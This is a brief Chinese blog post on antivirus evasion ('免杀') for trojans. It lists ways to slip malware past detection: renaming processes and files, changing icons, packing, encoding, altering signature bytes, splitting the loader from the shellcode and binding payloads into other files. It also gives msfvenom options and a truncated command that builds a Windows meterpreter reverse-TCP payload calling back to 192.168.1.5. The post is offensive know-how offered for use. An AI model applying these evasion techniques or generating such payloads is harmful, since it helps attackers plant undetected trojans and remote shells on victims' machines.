免杀基础
1.初步木马免杀可能要更改进程名称,图标,文件名称,文件属性,加壳,生成木马时使用编码
修改源码的特征码;对shellcode二次编译;免杀生成器;加载器和shellcode分离,
msfvenom免杀
常用命令:
x86 or x 64
-a : 指定位数 x
-p :指定payload模块 -l:列出可用项
-f:指定文件类型 -e:加载编码器
-b:-bad-chars 删除无效字符 -i:-iterations指定编码次数
-x:捆绑文件 -o:导出文件
一般来说捆绑文件的免杀机率会大一些
msfvenom -a x86 -p windows/meterpreter/reverse_tcp lhost=192.168.1.5 lport=
源码免杀
源码免杀基于特征码的一种免杀方式,定位源码中的特征代码进行修改就可以达到免杀效果:
定位特征码分为三种 1.定位到代码 2 定位到字符串 3 定位到输出表
攻击vs2012依赖文件 visual c++ mfc for and64
https://aka.ms/vs/16/release/vc_redist.x64.exe
杀软的疑似检测方向
1. 图标 2.关键字检测 3.配置文件的版本信息等(其实也是关键字)
标签:定位,免杀,文件,指定,源码,shellcode From: https://www.cnblogs.com/lisenMiller/p/17308341.html